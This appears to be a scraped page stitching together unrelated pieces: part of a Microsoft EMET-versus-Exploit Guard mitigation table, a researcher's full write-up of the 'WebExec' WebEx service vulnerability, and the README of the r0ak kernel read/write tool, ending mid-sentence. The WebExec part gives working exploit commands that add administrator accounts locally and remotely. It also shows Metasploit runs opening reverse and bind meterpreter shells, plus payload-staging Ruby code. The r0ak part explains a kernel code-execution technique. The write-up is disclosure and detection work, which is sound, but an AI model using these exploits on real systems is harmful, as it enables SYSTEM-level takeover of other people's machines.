(2) Additional requirements may apply (such as use of Windows Defender Antivirus). See Windows Defender Exploit Guard requirements for more details. Customizable mitigation options that are configured with Exploit protection do not require Windows Defender Antivirus.

Mitigation comparison

The mitigations available in EMET are included in Windows Defender Exploit Guard, under the exploit protection feature.

The table in this section indicates the availability and support of native mitigations between EMET and Exploit protection.

Mitigation Available in Windows Defender Exploit Guard Available in EMET
Arbitrary code guard (ACG) As «Memory Protection Check»
Block remote images As «Load Library Check»
Block untrusted fonts
Data Execution Prevention (DEP)
Export address filtering (EAF)
Force randomization for images (Mandatory ASLR)
NullPage Security Mitigation Included natively in Windows 10
See Mitigate threats by using Windows 10 security features for more information
Randomize memory allocations (Bottom-Up ASLR)
Simulate execution (SimExec)
Validate API invocation (CallerCheck)
Validate exception chains (SEHOP)
Validate stack integrity (StackPivot)
Certificate trust (configurable certificate pinning) Windows 10 provides enterprise certificate pinning
Heap spray allocation Ineffective against newer browser-based exploits; newer mitigations provide better protection
See Mitigate threats by using Windows 10 security features for more information
Block low integrity images
Code integrity guard
Disable extension points
Disable Win32k system calls
Do not allow child processes
Import address filtering (IAF)
Validate handle usage
Validate heap integrity
Validate image dependency integrity

 Note

The Advanced ROP mitigations that are available in EMET are superseded by ACG in Windows 10, which other EMET advanced settings are enabled by default in Windows Defender Exploit Guard as part of enabling the anti-ROP mitigations for a process.

See the Mitigation threats by using Windows 10 security features for more information on how Windows 10 employs existing EMET technology.

Technical Rundown of WebExec

This is a technical rundown of a vulnerability that we’ve dubbed «WebExec».

Картинки по запросу WebExecThe summary is: a flaw in WebEx’s WebexUpdateService allows anyone with a login to the Windows system where WebEx is installed to run SYSTEM-level code remotely. That’s right: this client-side application that doesn’t listen on any ports is actually vulnerable to remote code execution! A local or domain account will work, making this a powerful way to pivot through networks until it’s patched.

High level details and FAQ at https://webexec.org! Below is a technical writeup of how we found the bug and how it works.

Credit

This vulnerability was discovered by myself and Jeff McJunkin from Counter Hack during a routine pentest. Thanks to Ed Skoudis for permission to post this writeup.

If you have any questions or concerns, I made an email alias specifically for this issue: info@webexec.org!

You can download a vulnerable installer here and a patched one here, in case you want to play with this yourself! It probably goes without saying, but be careful if you run the vulnerable version!

Intro

During a recent pentest, we found an interesting vulnerability in the WebEx client software while we were trying to escalate local privileges on an end-user laptop. Eventually, we realized that this vulnerability is also exploitable remotely (given any domain user account) and decided to give it a name: WebExec. Because every good vulnerability has a name!

As far as we know, a remote attack against a 3rd party Windows service is a novel type of attack. We’re calling the class «thank you for your service», because we can, and are crossing our fingers that more are out there!

The actual version of WebEx is the latest client build as of August, 2018: Version 3211.0.1801.2200, modified 7/19/2018 SHA1: bf8df54e2f49d06b52388332938f5a875c43a5a7. We’ve tested some older and newer versions since then, and they are still vulnerable.

WebEx released patch on October 3, but requested we maintain embargo until they release their advisory. You can find all the patching instructions on webexec.org.

The good news is, the patched version of this service will only run files that are signed by WebEx. The bad news is, there are a lot of those out there (including the vulnerable version of the service!), and the service can still be started remotely. If you’re concerned about the service being remotely start-able by any user (which you should be!), the following command disables that function:

c:\>sc sdset webexservice D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPLORC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

That removes remote and non-interactive access from the service. It will still be vulnerable to local privilege escalation, though, without the patch.

Privilege Escalation

What initially got our attention is that folder (c:\ProgramData\WebEx\WebEx\Applications\) is readable and writable by everyone, and it installs a service called «webexservice» that can be started and stopped by anybody. That’s not good! It is trivial to replace the .exe or an associated .dll with anything we like, and get code execution at the service level (that’s SYSTEM). That’s an immediate vulnerability, which we reported, and which ZDI apparently beat us to the punch on, since it was fixed on September 5, 2018, based on their report.

Due to the application whitelisting, however, on this particular assessment we couldn’t simply replace this with a shell! The service starts non-interactively (ie, no window and no commandline arguments). We explored a lot of different options, such as replacing the .exe with other binaries (such as cmd.exe), but no GUI meant no ability to run commands.

One test that almost worked was replacing the .exe with another whitelisted application, msbuild.exe, which can read arbitrary C# commands out of a .vbproj file in the same directory. But because it’s a service, it runs with the working directory c:\windows\system32, and we couldn’t write to that folder!

At that point, my curiosity got the best of me, and I decided to look into what webexservice.exe actually does under the hood. The deep dive ended up finding gold! Let’s take a look

Deep dive into WebExService.exe

It’s not really a good motto, but when in doubt, I tend to open something in IDA. The two easiest ways to figure out what a process does in IDA is the strings windows (shift-F12) and the imports window. In the case of webexservice.exe, most of the strings were related to Windows service stuff, but something caught my eye:

  .rdata:00405438 ; wchar_t aSCreateprocess
  .rdata:00405438 aSCreateprocess:                        ; DATA XREF: sub_4025A0+1E8o
  .rdata:00405438                 unicode 0, <%s::CreateProcessAsUser:%d;%ls;%ls(%d).>,0

I found the import for CreateProcessAsUserW in advapi32.dll, and looked at how it was called:

  .text:0040254E                 push    [ebp+lpProcessInformation] ; lpProcessInformation
  .text:00402554                 push    [ebp+lpStartupInfo] ; lpStartupInfo
  .text:0040255A                 push    0               ; lpCurrentDirectory
  .text:0040255C                 push    0               ; lpEnvironment
  .text:0040255E                 push    0               ; dwCreationFlags
  .text:00402560                 push    0               ; bInheritHandles
  .text:00402562                 push    0               ; lpThreadAttributes
  .text:00402564                 push    0               ; lpProcessAttributes
  .text:00402566                 push    [ebp+lpCommandLine] ; lpCommandLine
  .text:0040256C                 push    0               ; lpApplicationName
  .text:0040256E                 push    [ebp+phNewToken] ; hToken
  .text:00402574                 call    ds:CreateProcessAsUserW

The W on the end refers to the UNICODE («wide») version of the function. When developing Windows code, developers typically use CreateProcessAsUser in their code, and the compiler expands it to CreateProcessAsUserA for ASCII, and CreateProcessAsUserW for UNICODE. If you look up the function definition for CreateProcessAsUser, you’ll find everything you need to know.

In any case, the two most important arguments here are hToken — the user it creates the process as — and lpCommandLine — the command that it actually runs. Let’s take a look at each!

hToken

The code behind hToken is actually pretty simple. If we scroll up in the same function that calls CreateProcessAsUserW, we can just look at API calls to get a feel for what’s going on. Trying to understand what code’s doing simply based on the sequence of API calls tends to work fairly well in Windows applications, as you’ll see shortly.

At the top of the function, we see:

  .text:0040241E                 call    ds:CreateToolhelp32Snapshot

This is a normal way to search for a specific process in Win32 — it creates a «snapshot» of the running processes and then typically walks through them using Process32FirstW and Process32NextW until it finds the one it needs. I even used the exact same technique a long time ago when I wrote my Injector tool for loading a custom .dll into another process (sorry for the bad code.. I wrote it like 15 years ago).

Based simply on knowledge of the APIs, we can deduce that it’s searching for a specific process. If we keep scrolling down, we can find a call to _wcsicmp, which is a Microsoft way of saying stricmp for UNICODE strings:

  .text:00402480                 lea     eax, [ebp+Str1]
  .text:00402486                 push    offset Str2     ; "winlogon.exe"
  .text:0040248B                 push    eax             ; Str1
  .text:0040248C                 call    ds:_wcsicmp
  .text:00402492                 add     esp, 8
  .text:00402495                 test    eax, eax
  .text:00402497                 jnz     short loc_4024BE

Specifically, it’s comparing the name of each process to «winlogon.exe» — so it’s trying to get a handle to the «winlogon.exe» process!

If we continue down the function, you’ll see that it calls OpenProcess, then OpenProcessToken, then DuplicateTokenEx. That’s another common sequence of API calls — it’s how a process can get a handle to another process’s token. Shortly after, the token it duplicates is passed to CreateProcessAsUserW as hToken.

To summarize: this function gets a handle to winlogon.exe, duplicates its token, and creates a new process as the same user (SYSTEM). Now all we need to do is figure out what the process is!

An interesting takeaway here is that I didn’t really really read assembly at all to determine any of this: I simply followed the API calls. Often, reversing Windows applications is just that easy!

lpCommandLine

This is where things get a little more complicated, since there are a series of function calls to traverse to figure out lpCommandLine. I had to use a combination of reversing, debugging, troubleshooting, and eventlogs to figure out exactly where lpCommandLine comes from. This took a good full day, so don’t be discouraged by this quick summary — I’m skipping an awful lot of dead ends and validation to keep just to the interesting bits.

One such dead end: I initially started by working backwards from CreateProcessAsUserW, or forwards from main(), but I quickly became lost in the weeds and decided that I’d have to go the other route. While scrolling around, however, I noticed a lot of debug strings and calls to the event log. That gave me an idea — I opened the Windows event viewer (eventvwr.msc) and tried to start the process with sc start webexservice:

C:\Users\ron>sc start webexservice

SERVICE_NAME: webexservice
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2  START_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
[...]

You may need to configure Event Viewer to show everything in the Application logs, I didn’t really know what I was doing, but eventually I found a log entry for WebExService.exe:

  ExecuteServiceCommand::Not enough command line arguments to execute a service command.

That’s handy! Let’s search for that in IDA (alt+T)! That leads us to this code:

  .text:004027DC                 cmp     edi, 3
  .text:004027DF                 jge     short loc_4027FD
  .text:004027E1                 push    offset aExecuteservice ; &quot;ExecuteServiceCommand&quot;
  .text:004027E6                 push    offset aSNotEnoughComm ; &quot;%s::Not enough command line arguments t&quot;...
  .text:004027EB                 push    2               ; wType
  .text:004027ED                 call    sub_401770

A tiny bit of actual reversing: compare edit to 3, jump if greater or equal, otherwise print that we need more commandline arguments. It doesn’t take a huge logical leap to determine that we need 2 or more commandline arguments (since the name of the process is always counted as well). Let’s try it:

C:\Users\ron>sc start webexservice a b

[...]

Then check Event Viewer again:

  ExecuteServiceCommand::Service command not recognized: b.

Don’t you love verbose error messages? It’s like we don’t even have to think! Once again, search for that string in IDA (alt+T) and we find ourselves here:

  .text:00402830 loc_402830:                             ; CODE XREF: sub_4027D0+3Dj
  .text:00402830                 push    dword ptr [esi+8]
  .text:00402833                 push    offset aExecuteservice ; "ExecuteServiceCommand"
  .text:00402838                 push    offset aSServiceComman ; "%s::Service command not recognized: %ls"...
  .text:0040283D                 push    2               ; wType
  .text:0040283F                 call    sub_401770

If we scroll up just a bit to determine how we get to that error message, we find this:

  .text:004027FD loc_4027FD:                             ; CODE XREF: sub_4027D0+Fj
  .text:004027FD                 push    offset aSoftwareUpdate ; "software-update"
  .text:00402802                 push    dword ptr [esi+8] ; lpString1
  .text:00402805                 call    ds:lstrcmpiW
  .text:0040280B                 test    eax, eax
  .text:0040280D                 jnz     short loc_402830 ; <-- Jumps to the error we saw
  .text:0040280F                 mov     [ebp+var_4], eax
  .text:00402812                 lea     edx, [esi+0Ch]
  .text:00402815                 lea     eax, [ebp+var_4]
  .text:00402818                 push    eax
  .text:00402819                 push    ecx
  .text:0040281A                 lea     ecx, [edi-3]
  .text:0040281D                 call    sub_4025A0

The string software-update is what the string is compared to. So instead of b, let’s try software-update and see if that gets us further! I want to once again point out that we’re only doing an absolutely minimum amount of reverse engineering at the assembly level — we’re basically entirely using API calls and error messages!

Here’s our new command:

C:\Users\ron>sc start webexservice a software-update

[...]

Which results in the new log entry:

  Faulting application name: WebExService.exe, version: 3211.0.1801.2200, time stamp: 0x5b514fe3
  Faulting module name: WebExService.exe, version: 3211.0.1801.2200, time stamp: 0x5b514fe3
  Exception code: 0xc0000005
  Fault offset: 0x00002643
  Faulting process id: 0x654
  Faulting application start time: 0x01d42dbbf2bcc9b8
  Faulting application path: C:\ProgramData\Webex\Webex\Applications\WebExService.exe
  Faulting module path: C:\ProgramData\Webex\Webex\Applications\WebExService.exe
  Report Id: 31555e60-99af-11e8-8391-0800271677bd

Uh oh! I’m normally excited when I get a process to crash, but this time I’m actually trying to use its features! What do we do!?

First of all, we can look at the exception code: 0xc0000005. If you Google it, or develop low-level software, you’ll know that it’s a memory fault. The process tried to access a bad memory address (likely NULL, though I never verified).

The first thing I tried was the brute-force approach: let’s add more commandline arguments! My logic was that it might require 2 arguments, but actually use the third and onwards for something then crash when they aren’t present.

So I started the service with the following commandline:

C:\Users\ron>sc start webexservice a software-update a b c d e f

[...]

That led to a new crash, so progress!

  Faulting application name: WebExService.exe, version: 3211.0.1801.2200, time stamp: 0x5b514fe3
  Faulting module name: MSVCR120.dll, version: 12.0.21005.1, time stamp: 0x524f7ce6
  Exception code: 0x40000015
  Fault offset: 0x000a7676
  Faulting process id: 0x774
  Faulting application start time: 0x01d42dbc22eef30e
  Faulting application path: C:\ProgramData\Webex\Webex\Applications\WebExService.exe
  Faulting module path: C:\ProgramData\Webex\Webex\Applications\MSVCR120.dll
  Report Id: 60a0439c-99af-11e8-8391-0800271677bd

I had to google 0x40000015; it means STATUS_FATAL_APP_EXIT. In other words, the app exited, but hard — probably a failed assert()? We don’t really have any output, so it’s hard to say.

This one took me awhile, and this is where I’ll skip the deadends and debugging and show you what worked.

Basically, keep following the codepath immediately after the software-update string we saw earlier. Not too far after, you’ll see this function call:

  .text:0040281D                 call    sub_4025A0

If you jump into that function (double click), and scroll down a bit, you’ll see:

  .text:00402616                 mov     [esp+0B4h+var_70], offset aWinsta0Default ; "winsta0\\Default"

I used the most advanced technique in my arsenal here and googled that string. It turns out that it’s a handle to the default desktop and is frequently used when starting a new process that needs to interact with the user. That’s a great sign, it means we’re almost there!

A little bit after, in the same function, we see this code:

  .text:004026A2                 push    eax             ; EndPtr
  .text:004026A3                 push    esi             ; Str
  .text:004026A4                 call    ds:wcstod ; <--
  .text:004026AA                 add     esp, 8
  .text:004026AD                 fstp    [esp+0B4h+var_90]
  .text:004026B1                 cmp     esi, [esp+0B4h+EndPtr+4]
  .text:004026B5                 jnz     short loc_4026C2
  .text:004026B7                 push    offset aInvalidStodArg ; &quot;invalid stod argument&quot;
  .text:004026BC                 call    ds:?_Xinvalid_argument@std@@YAXPBD@Z ; std::_Xinvalid_argument(char const *)

The line with an error — wcstod() is close to where the abort() happened. I’ll spare you the debugging details — debugging a service was non-trivial — but I really should have seen that function call before I got off track.

I looked up wcstod() online, and it’s another of Microsoft’s cleverly named functions. This one converts a string to a number. If it fails, the code references something called std::_Xinvalid_argument. I don’t know exactly what it does from there, but we can assume that it’s looking for a number somewhere.

This is where my advice becomes «be lucky». The reason is, the only number that will actually work here is «1». I don’t know why, or what other numbers do, but I ended up calling the service with the commandline:

C:\Users\ron>sc start webexservice a software-update 1 2 3 4 5 6

And checked the event log:

  StartUpdateProcess::CreateProcessAsUser:1;1;2 3 4 5 6(18).

That looks awfully promising! I changed 2 to an actual process:

  C:\Users\ron>sc start webexservice a software-update 1 calc c d e f

And it opened!

C:\Users\ron>tasklist | find "calc"
calc.exe                      1476 Console                    1     10,804 K

It actually runs with a GUI, too, so that’s kind of unnecessary. I could literally see it! And it’s running as SYSTEM!

Speaking of unknowns, running cmd.exe and powershell the same way does not appear to work. We can, however, run wmic.exe and net.exe, so we have some choices!

Local exploit

The simplest exploit is to start cmd.exe with wmic.exe:

C:\Users\ron>sc start webexservice a software-update 1 wmic process call create "cmd.exe"

That opens a GUI cmd.exe instance as SYSTEM:

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
nt authority\system

If we can’t or choose not to open a GUI, we can also escalate privileges:

C:\Users\ron>net localgroup administrators
[...]
Administrator
ron

C:\Users\ron>sc start webexservice a software-update 1 net localgroup administrators testuser /add
[...]

C:\Users\ron>net localgroup administrators
[...]
Administrator
ron
testuser

And this all works as an unprivileged user!

Jeff wrote a local module for Metasploit to exploit the privilege escalation vulnerability. If you have a non-SYSTEM session on the affected machine, you can use it to gain a SYSTEM account:

meterpreter > getuid
Server username: IEWIN7\IEUser

meterpreter > background
[*] Backgrounding session 2...

msf exploit(multi/handler) > use exploit/windows/local/webexec
msf exploit(windows/local/webexec) > set SESSION 2
SESSION => 2

msf exploit(windows/local/webexec) > set payload windows/meterpreter/reverse_tcp
msf exploit(windows/local/webexec) > set LHOST 172.16.222.1
msf exploit(windows/local/webexec) > set LPORT 9001
msf exploit(windows/local/webexec) > run

[*] Started reverse TCP handler on 172.16.222.1:9001
[*] Checking service exists...
[*] Writing 73802 bytes to %SystemRoot%\Temp\yqaKLvdn.exe...
[*] Launching service...
[*] Sending stage (179779 bytes) to 172.16.222.132
[*] Meterpreter session 2 opened (172.16.222.1:9001 -> 172.16.222.132:49574) at 2018-08-31 14:45:25 -0700
[*] Service started...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Remote exploit

We actually spent over a week knowing about this vulnerability without realizing that it could be used remotely! The simplest exploit can still be done with the Windows sc command. Either create a session to the remote machine or create a local user with the same credentials, then run cmd.exe in the context of that user (runas /user:newuser cmd.exe). Once that’s done, you can use the exact same command against the remote host:

c:\>sc \\10.0.0.0 start webexservice a software-update 1 net localgroup administrators testuser /add

The command will run (and a GUI will even pop up!) on the other machine.

Remote exploitation with Metasploit

To simplify this attack, I wrote a pair of Metasploit modules. One is an auxiliary module that implements this attack to run an arbitrary command remotely, and the other is a full exploit module. Both require a valid SMB account (local or domain), and both mostly depend on the WebExec library that I wrote.

Here is an example of using the auxiliary module to run calc on a bunch of vulnerable machines:

msf5 > use auxiliary/admin/smb/webexec_command
msf5 auxiliary(admin/smb/webexec_command) > set RHOSTS 192.168.1.100-110
RHOSTS => 192.168.56.100-110
msf5 auxiliary(admin/smb/webexec_command) > set SMBUser testuser
SMBUser => testuser
msf5 auxiliary(admin/smb/webexec_command) > set SMBPass testuser
SMBPass => testuser
msf5 auxiliary(admin/smb/webexec_command) > set COMMAND calc
COMMAND => calc
msf5 auxiliary(admin/smb/webexec_command) > exploit

[-] 192.168.56.105:445    - No service handle retrieved
[+] 192.168.56.105:445    - Command completed!
[-] 192.168.56.103:445    - No service handle retrieved
[+] 192.168.56.103:445    - Command completed!
[+] 192.168.56.104:445    - Command completed!
[+] 192.168.56.101:445    - Command completed!
[*] 192.168.56.100-110:445 - Scanned 11 of 11 hosts (100% complete)
[*] Auxiliary module execution completed

And here’s the full exploit module:

msf5 > use exploit/windows/smb/webexec
msf5 exploit(windows/smb/webexec) > set SMBUser testuser
SMBUser => testuser
msf5 exploit(windows/smb/webexec) > set SMBPass testuser
SMBPass => testuser
msf5 exploit(windows/smb/webexec) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf5 exploit(windows/smb/webexec) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf5 exploit(windows/smb/webexec) > exploit

[*] 192.168.56.101:445 - Connecting to the server...
[*] 192.168.56.101:445 - Authenticating to 192.168.56.101:445 as user 'testuser'...
[*] 192.168.56.101:445 - Command Stager progress -   0.96% done (999/104435 bytes)
[*] 192.168.56.101:445 - Command Stager progress -   1.91% done (1998/104435 bytes)
...
[*] 192.168.56.101:445 - Command Stager progress -  98.52% done (102891/104435 bytes)
[*] 192.168.56.101:445 - Command Stager progress -  99.47% done (103880/104435 bytes)
[*] 192.168.56.101:445 - Command Stager progress - 100.00% done (104435/104435 bytes)
[*] Started bind TCP handler against 192.168.56.101:4444
[*] Sending stage (179779 bytes) to 192.168.56.101

The actual implementation is mostly straight forward if you look at the code linked above, but I wanted to specifically talk about the exploit module, since it had an interesting problem: how do you initially get a meterpreter .exe uploaded to execute it?

I started by using a psexec-like exploit where we upload the .exe file to a writable share, then execute it via WebExec. That proved problematic, because uploading to a share frequently requires administrator privileges, and at that point you could simply use psexecinstead. You lose the magic of WebExec!

After some discussion with Egyp7, I realized I could use the Msf::Exploit::CmdStager mixin to stage the command to an .exe file to the filesystem. Using the .vbs flavor of staging, it would write a Base64-encoded file to the disk, then a .vbs stub to decode and execute it!

There are several problems, however:

  • The max line length is ~1200 characters, whereas the CmdStager mixin uses ~2000 characters per line
  • CmdStager uses %TEMP% as a temporary directory, but our exploit doesn’t expand paths
  • WebExecService seems to escape quotation marks with a backslash, and I’m not sure how to turn that off

The first two issues could be simply worked around by adding options (once I’d figured out the options to use):

wexec(true) do |opts|
  opts[:flavor] = :vbs
  opts[:linemax] = datastore["MAX_LINE_LENGTH"]
  opts[:temp] = datastore["TMPDIR"]
  opts[:delay] = 0.05
  execute_cmdstager(opts)
end

execute_cmdstager() will execute execute_command() over and over to build the payload on-disk, which is where we fix the final issue:

# This is the callback for cmdstager, which breaks the full command into
# chunks and sends it our way. We have to do a bit of finangling to make it
# work correctly
def execute_command(command, opts)
  # Replace the empty string, "", with a workaround - the first 0 characters of "A"
  command = command.gsub('""', 'mid(Chr(65), 1, 0)')

  # Replace quoted strings with Chr(XX) versions, in a naive way
  command = command.gsub(/"[^"]*"/) do |capture|
    capture.gsub(/"/, "").chars.map do |c|
      "Chr(#{c.ord})"
    end.join('+')
  end

  # Prepend "cmd /c" so we can use a redirect
  command = "cmd /c " + command

  execute_single_command(command, opts)
end

First, it replaces the empty string with mid(Chr(65), 1, 0), which works out to characters 1 — 1 of the string «A». Or the empty string!

Second, it replaces every other string with Chr(n)+Chr(n)+.... We couldn’t use &, because that’s already used by the shell to chain commands. I later learned that we can escape it and use ^&, which works just fine, but + is shorter so I stuck with that.

And finally, we prepend cmd /c to the command, which lets us echo to a file instead of just passing the > symbol to the process. We could probably use ^> instead.

In a targeted attack, it’s obviously possible to do this much more cleanly, but this seems to be a great way to do it generically!

Checking for the patch

This is one of those rare (or maybe not so rare?) instances where exploiting the vulnerability is actually easier than checking for it!

The patched version of WebEx still allows remote users to connect to the process and start it. However, if the process detects that it’s being asked to run an executable that is not signed by WebEx, the execution will halt. Unfortunately, that gives us no information about whether a host is vulnerable!

There are a lot of targeted ways we could validate whether code was run. We could use a DNS request, telnet back to a specific port, drop a file in the webroot, etc. The problem is that unless we have a generic way to check, it’s no good as a script!

In order to exploit this, you have to be able to get a handle to the service-controlservice (svcctl), so to write a checker, I decided to install a fake service, try to start it, then delete the service. If starting the service returns either 

OK

 or 

ACCESS_DENIED

, we know it worked!

Here’s the important code from the Nmap checker module we developed:

-- Create a test service that we can query
local webexec_command = "sc create " .. test_service .. " binpath= c:\\fakepath.exe"
status, result = msrpc.svcctl_startservicew(smbstate, open_service_result['handle'], stdnse.strsplit(" ", "install software-update 1 " .. webexec_command))

-- ...

local test_status, test_result = msrpc.svcctl_openservicew(smbstate, open_result['handle'], test_service, 0x00000)

-- If the service DOES_NOT_EXIST, we couldn't run code
if string.match(test_result, 'DOES_NOT_EXIST') then
  stdnse.debug("Result: Test service does not exist: probably not vulnerable")
  msrpc.svcctl_closeservicehandle(smbstate, open_result['handle'])

  vuln.check_results = "Could not execute code via WebExService"
  return report:make_output(vuln)
end

Not shown: we also delete the service once we’re finished.

Conclusion

So there you have it! Escalating privileges from zero to SYSTEM using WebEx’s built-in update service! Local and remote! Check out webexec.org for tools and usage instructions!

R0Ak (The Ring 0 Army Knife) — A Command Line Utility To Read/Write/Execute Ring Zero On For Windows 10 Systems

r0ak is a Windows command-line utility that enables you to easily read, write, and execute kernel-mode code (with some limitations) from the command prompt, without requiring anything else other than Administrator privileges.

Quick Peek


r0ak v1.0.0 -- Ring 0 Army Knife
<a class="vglnk" href="http://www.github.com/ionescu007/r0ak" rel="nofollow">http://www.github.com/ionescu007/r0ak</a>
Copyright (c) 2018 Alex Ionescu [@aionescu]
<a class="vglnk" href="http://www.windows-internals.com/" rel="nofollow">http://www.windows-internals.com</a>

USAGE: r0ak.exe
       [--execute &lt;Address | module.ext!function&gt; &lt;Argument&gt;]
       [--write   &lt;Address | module.ext!function&gt; &lt;Value&gt;]
       [--read    &lt;Address | module.ext!function&gt; &lt;Size&gt;]

Introduction

Motivation
The Windows kernel is a rich environment in which hundreds of drivers execute on a typical system, and where thousands of variables containing global state are present. For advanced troubleshooting, IT experts will typically use tools such as the Windows Debugger (WinDbg), SysInternals Tools, or write their own. Unfortunately, usage of these tools is getting increasingly hard, and they are themselves limited by their own access to Windows APIs and exposed features.
Some of today’s challenges include:

  • Windows 8 and later support Secure Boot, which prevents kernel debugging (including local debugging) and loading of test-signed driver code. This restricts troubleshooting tools to those that have a signed kernel-mode driver.
  • Even on systems without Secure Boot enabled, enabling local debugging or changing boot options which ease debugging capabilities will often trigger BitLocker’s recovery mode.
  • Windows 10 Anniversary Update and later include much stricter driver signature requirements, which now enforce Microsoft EV Attestation Signing. This restricts the freedom of software developers as generic «read-write-everything» drivers are frowned upon.
  • Windows 10 Spring Update now includes customer-facing options for enabling HyperVisor Code Integrity (HVCI) which further restricts allowable drivers and blacklists multiple 3rd party drivers that had «read-write-everything» capabilities due to poorly written interfaces and security risks.
  • Technologies like Supervisor Mode Execution Prevention (SMEP), Kernel Control Flow Guard (KCFG) and HVCI with Second Level Address Translation (SLAT) are making traditional Ring 0 execution ‘tricks’ obsoleted, so a new approach is needed.

In such an environment, it was clear that a simple tool which can be used as an emergency band-aid/hotfix and to quickly troubleshoot kernel/system-level issues which may be apparent by analyzing kernel state might be valuable for the community.

How it Works

Basic Architecture

r0ak works by redirecting the execution flow of the window manager’s trusted font validation checks when attempting to load a new font, by replacing the trusted font table’s comparator routine with an alternate function which schedules an executive work item (

WORK_QUEUE_ITEM

) stored in the input node. Then, the trusted font table’s right child (which serves as the root node) is overwritten with a named pipe’s write buffer (

NP_DATA_ENTRY

) in which a custom work item is stored. This item’s underlying worker function and its parameter are what will eventually be executed by a dedicated 

ExpWorkerThread

 at 

PASSIVE_LEVEL

once a font load is attempted and the comparator routine executes, receiving the name pipe-backed parent node as its input. A real-time Event Tracing for Windows (ETW) trace event is used to receive an asynchronous notification that the work item has finished executing, which makes it safe to tear down the structures, free the kernel-mode buffers, and restore normal operation.

Supported Commands
When using the 

--execute

 option, this function and parameter are supplied by the user.
When using 

--write

, a custom gadget is used to modify arbitrary 32-bit values anywhere in kernel memory.
When using 

--read

, the write gadget is used to modify the system’s HSTI buffer pointer and size (N.B.: This is destructive behavior in terms of any other applications that will request the HSTI data. As this is optional Windows behavior, and this tool is meant for emergency debugging/experimentation, this loss of data was considered acceptable). Then, the HSTI Query API is used to copy back into the tool’s user-mode address space, and a hex dump is shown.
Because only built-in, Microsoft-signed, Windows functionality is used, and all called functions are part of the KCFG bitmap, there is no violation of any security checks, and no debugging flags are required, or usage of 3rd party poorly-written drivers.

FAQ

Is this a bug/vulnerability in Windows?
No. Since this tool — and the underlying technique — require a SYSTEM-level privileged token, which can only be obtained by a user running under the Administrator account, no security boundaries are being bypassed in order to achieve the effect. The behavior and utility of the tool is only possible due to the elevated/privileged security context of the Administrator account on Windows, and is understood to be a by-design behavior.

Was Microsoft notified about this behavior?
Of course! It’s important to always file security issues with Microsoft even when no violation of privileged boundaries seems to have occurred — their teams of researchers and developers might find novel vectors and ways to reach certain code paths which an external researcher may not have thought of.
As such, in November 2014, a security case was filed with the Microsoft Security Research Centre (MSRC) which responded: «[…] doesn’t fall into the scope of a security issue we would address via our traditional Security Bulletin vehicle. It […] pre-supposes admin privileges — a place where architecturally, we do not currently define a defensible security boundary. As such, we won’t be pursuing this to fix.»
Furthermore, in April 2015 at the Infiltrate conference, a talk titled Insection : AWEsomely Exploiting Shared Memory Objects was presented detailing this issue, including to Microsoft developers in attendance, which agreed this was currently out of scope of Windows’s architectural security boundaries. This is because there are literally dozens — if not more — of other ways an Administrator can read/write/execute Ring 0 memory. This tool merely allows an easy commodification of one such vector, for purposes of debugging and troubleshooting system issues.

Can’t this be packaged up as part of end-to-end attack/exploit kit?
Packaging this code up as a library would require carefully removing all interactive command-line parsing and standard output, at which point, without major rewrites, the ‘kit’ would:

  • Require the target machine to be running Windows 10 Anniversary Update x64 or later
  • Have already elevated privileges to SYSTEM
  • Require an active Internet connection with a proxy/firewall allowing access to Microsoft’s Symbol Server
  • Require the Windows SDK/WDK installed on the target machine
  • Require a sensible _NT_SYMBOL_PATH environment variable to have been configured on the target machine, and for about 15MB of symbol data to be downloaded and cached as PDB files somewhere on the disk

Attackers interested in using this particular approach — versus very many others more cross-compatible, no-SYSTEM-right-requiring techniques — likely already adapted their own code based on the Proof-of-Concept from April 2015 — more than 3 years ago.

Usage

Requirements
Due to the usage of the Windows Symbol Engine, you must have either the Windows Software Development Kit (SDK) or Windows Driver Kit (WDK) installed with the Debugging Tools for Windows. The tool will lookup your installation path automatically, and leverage the 

DbgHelp.dll

 and 

SymSrv.dll

 that are present in that directory. As these files are not re-distributable, they cannot be included with the release of the tool.
Alternatively, if you obtain these libraries on your own, you can modify the source-code to use them.
Usage of symbols requires an Internet connection, unless you have pre-cached them locally. Additionally, you should setup the 

_NT_SYMBOL_PATH

 variable pointing to an appropriate symbol server and cached location.
It is assumed that an IT Expert or other troubleshooter which apparently has a need to read/write/execute kernel memory (and has knowledge of the appropriate kernel variables to access) is already more than intimately familiar with the above setup requirements. Please do not file issues asking what the SDK is or how to set an environment variable.

Use Cases

  • Some driver leaked kernel pool? Why not call 
    ntoskrnl.exe!ExFreePool

     and pass in the kernel address that’s leaking? What about an object reference? Go call 

    ntoskrnl.exe!ObfDereferenceObject

     and have that cleaned up.

  • Want to dump the kernel DbgPrint log? Why not dump the internal circular buffer at 
    ntoskrnl.exe!KdPrintCircularBuffer
  • Wondering how big the kernel stacks are on your machine? Try looking at 
    ntoskrnl.exe!KeKernelStackSize
  • Want to dump the system call table to look for hooks? Go print out 
    ntoskrnl.exe!KiServiceTable

These are only a few examples — all Ring 0 addresses are accepted, either by 

module!symbol

 syntax or directly passing the kernel pointer if known. The Windows Symbol Engine is used to look these up.

Limitations
The tool requires certain kernel variables and functions that are only known to exist in modern versions of Windows 10, and was only meant to work on 64-bit systems. These limitations are due to the fact that on older systems (or x86 systems), these stricter security requirements don’t exist, and as such, more traditional approaches can be used instead. This is a personal tool which I am making available, and I had no need for these older systems, where I could use a simple driver instead. That being said, this repository accepts pull requests, if anyone is interested in porting it.
Secondly, due to the use cases and my own needs, the following restrictions apply:

  • Reads — Limited to 4 GB of data at a time
  • Writes — Limited to 32-bits of data at a time
  • Executes — Limited to functions which only take 1 scalar parameter

Obviously, these limitations could be fixed by programmatically choosing a different approach, but they fit the needs of a command line tool and my use cases. Again, pull requests are accepted if others wish to contribute their own additions.
Note that all execution (including execution of the 

--read

 and 

--write

 commands) occurs in the context of a System Worker Thread at 

